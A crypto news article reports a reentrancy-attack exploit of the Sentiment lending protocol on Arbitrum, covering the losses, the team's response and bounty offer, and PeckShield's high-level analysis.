Key takeaways:
- Sentiment, an uncollateralized loan protocol, has been hacked on for more than $500,000 in cryptocurrency.
- The assault on the DeFi lending platform has been classified as a reentry attack.
- The attacker appears to have stolen the tokens using a re-entry vulnerability and then transferred them to the Ethereum network.
A malicious exploit affected Sentiment, a decentralised finance (DeFi) tool that provides lending and borrowing services on the Arbitrum layer-2 network, causing a loss of almost $1 million.
The team suspended the Sentiment main contract and limited capability to only processing withdrawals, according to the Twitter thread, in order to prevent the loss of additional funds.
Data from the Ethereum network reveals a transaction that moved 536,738.410031 USD Coins from the Synapse Bridge. This transaction connects to a string of Arbitrum transactions that drained Sentiment of its coins.
The team has worked with outside security auditors to execute a user-pleasing fix for the issue. Users can pay off debts and exit jobs as a result. To find the perpetrator and get the money back, the team is also collaborating with law enforcement and other parties.
According to developer Pascal Marco Caversaccio, the event was probably caused by a reentrancy attack. In this line of attack, an exposed Sentiment contract was frequently called by a third-party contract before its status could be revised.
The reentrancy attack occurs when a malicious party uses a smart contract flaw to frequently withdraw money that was sent to an unapproved contract.
Another protocol fell prey to a similar reentrancy attack last month. A loss of almost $3.65 million was caused by an assault on dForce, an Integrated Platform for DeFi Protocols. The hack was directed at Curve Finance, an automatic market maker (AMM) platform that utilises the Optimism and Arbitrum blockchains.
Sentiment also contacted the hacker, offering to give them a bounty of 10% of the money they had stolen in exchange for returning the remainder. If the assets were returned by April 6 at 8 a.m. UTC, the company agreed to pay $95,000.
PeckShield, the platform’s security advisor, documented the exploit’s analysis on its blog, outlining how the attacker manipulated pool balances and overcollateralized Sentiment loans by taking advantage of a view reentrancy bug in Balancer.
According to Peckshield, the attacker made off with about $1 million worth of cryptocurrency after taking significant amounts of tokens from Sentiment using flash loans.